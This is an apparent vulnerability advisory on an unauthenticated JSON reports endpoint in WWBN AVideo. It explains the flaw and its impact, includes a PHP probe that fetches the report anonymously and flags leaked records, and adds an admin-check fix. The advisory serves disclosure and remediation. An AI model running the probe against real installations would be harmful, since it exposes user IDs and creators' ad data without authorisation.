WWBN AVideo Unauthenticated Access to AD_Server JSON Reports Endpoint Vulnerability

Vulnerability

A vulnerability exists in WWBN AVideo versions through 26.0: the 'plugin/AD_Server/reports.json.php' endpoint performs no authentication or authorization check before returning data. Unauthenticated attackers can therefore read ad campaign analytics, including video titles, user channel names, user IDs, ad campaign names, and impression/click counts. The HTML and CSV versions of the same report correctly restrict access to admin users; only the JSON API is left unprotected, because it never verifies that the requester is an authenticated admin.

Impact

Exploitation of this vulnerability allows unauthenticated attackers to access ad campaign analytics and user data that should be restricted to administrators. An attacker can enumerate platform users by extracting user IDs and channel names, read detailed ad performance metrics, and, on multi-tenant instances, gather competitive intelligence by extracting another content creator's ad performance data.

Reproduction

The vulnerability can be reproduced by sending a request to the 'plugin/AD_Server/reports.json.php' endpoint without any session cookie or credentials. Several report types can be requested, each returning a different set of data. For example, the 'adsByVideo' report type returns a JSON array with video titles, channel names, user IDs, and campaign names. A plain curl request to the endpoint is enough to demonstrate the missing authentication check.
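The probe below is an added example, not code from the AVideo project or from the original report. It requests the report without a session and classifies the response, so a tester can tell a genuine leak apart from a login redirect or an error envelope. Two things are assumptions, because the page does not state them: that the report type is selected by a query parameter named 'type', and the field names ('users_id', 'channelName', 'title', 'campaign', 'impressions', 'clicks') used to recognise leaked records. The sample response at the bottom is constructed for the offline run.

```php
<?php
// Added example (not AVideo project code): probe reports.json.php without a
// session and decide whether it leaked campaign analytics.
// Assumed: the report type is chosen by a query parameter named "type";
// the record field names below are an assumption, adjust them to the real output.

function buildReportUrl(string $baseUrl, string $reportType): string {
    return rtrim($baseUrl, '/')
        . '/plugin/AD_Server/reports.json.php?type=' . rawurlencode($reportType);
}

// Plain GET with no cookies and no Authorization header: an anonymous client.
function fetchUnauthenticated(string $url): array {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,   // a redirect to a login page is itself a signal
        CURLOPT_HTTPHEADER     => ['Accept: application/json'],
        CURLOPT_TIMEOUT        => 15,
    ]);
    $body   = curl_exec($ch);
    $status = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return [$status, $body === false ? '' : $body];
}

// "leak": anonymous request got records with identifying fields.
// "protected": the server denied or redirected the request, or returned an error envelope.
// "unknown": anything else (empty report, non-JSON body), worth a manual look.
function classifyResponse(int $status, string $body): string {
    if ($status === 401 || $status === 403 || ($status >= 300 && $status < 400)) {
        return 'protected';
    }
    $data = json_decode($body, true);
    if (!is_array($data) || $data === []) {
        return 'unknown';
    }
    if (isset($data['error']) && $data['error']) {
        return 'protected';
    }
    $isList  = array_keys($data) === range(0, count($data) - 1);
    $records = $isList ? $data : [$data];
    // Assumed field names for the adsByVideo rows.
    $sensitive = ['users_id', 'channelName', 'title', 'campaign', 'impressions', 'clicks'];
    foreach ($records as $record) {
        if (is_array($record) && array_intersect($sensitive, array_keys($record)) !== []) {
            return 'leak';
        }
    }
    return 'unknown';
}

if (PHP_SAPI === 'cli') {
    if (isset($argv[1])) {
        // Live run: php probe.php https://avideo.example.test
        foreach (['adsByVideo'] as $type) {
            [$status, $body] = fetchUnauthenticated(buildReportUrl($argv[1], $type));
            printf("%-12s HTTP %d -> %s\n", $type, $status, classifyResponse($status, $body));
        }
    } else {
        // Offline run against a constructed response shaped like the report described above.
        $constructed = json_encode([
            ['title' => 'Intro video', 'channelName' => 'creator-a', 'users_id' => 7,
             'campaign' => 'spring-launch', 'impressions' => 120, 'clicks' => 9],
        ]);
        echo classifyResponse(200, $constructed), PHP_EOL;                      // leak
        echo classifyResponse(403, '{"error":true,"msg":"Permission denied"}'), PHP_EOL; // protected
    }
}
```

Run it once before and once after applying the fix: the first run should report 'leak' for the anonymous request, the second 'protected'. A 302 to the login page also counts as protected, which is why redirects are not followed.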

Remediation

To address this vulnerability, add 'User::isAdmin()' checks at the top of both 'reports.json.php' and 'getData.json.php', before any report data is built or returned, mirroring the existing checks in their HTML and CSV counterparts.
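The guard below is an added example of that fix, not a patch taken from the AVideo project. It shows the unprotected pattern as a comment beside the hardened prologue that both JSON endpoints need. The include path to 'videos/configuration.php', the '{"error":true,"msg":...}' response shape and the '__()' translation helper are assumed to match the project's other JSON endpoints; verify them against the files being edited.

```php
<?php
// Added example (not the project's own code): admin guard for
// plugin/AD_Server/reports.json.php and getData.json.php.
// Assumed: the relative path to videos/configuration.php, the error-envelope
// shape and the __() helper follow the conventions of AVideo's other JSON endpoints.
require_once dirname(__FILE__) . '/../../videos/configuration.php';

header('Content-Type: application/json');

// Vulnerable pattern (what the unprotected endpoint effectively does):
//
//   $report = /* build the requested report from the database */;
//   echo json_encode($report);          // no identity check of any kind
//
// Every anonymous GET reaches the report-building code and gets the data.

// Hardened pattern: refuse anything that is not an authenticated admin session
// before a single row is read. User::isAdmin() is the same check the HTML and
// CSV reports already perform.
if (!User::isAdmin()) {
    http_response_code(403);
    $obj        = new stdClass();
    $obj->error = true;
    $obj->msg   = __('Permission denied');
    die(json_encode($obj));
}

// ... the existing report-building code continues unchanged below this point.
```

After the change, an anonymous request must receive HTTP 403 with the error envelope, and a request carrying a valid admin session must receive the report exactly as before; test both, since a guard that only checks for a logged-in user (rather than an admin) would still expose every creator's campaign data to any registered account.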

Added: Mar 23, 2026, 7:25 PM
Updated: Mar 23, 2026, 7:25 PM

Vulnerability Rating

Custom Algorithm

spread: 1.0
impact: 0.6
exploitability: 9.7
remediation: 0.0
relevance: 4.6
threat: 6.4
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.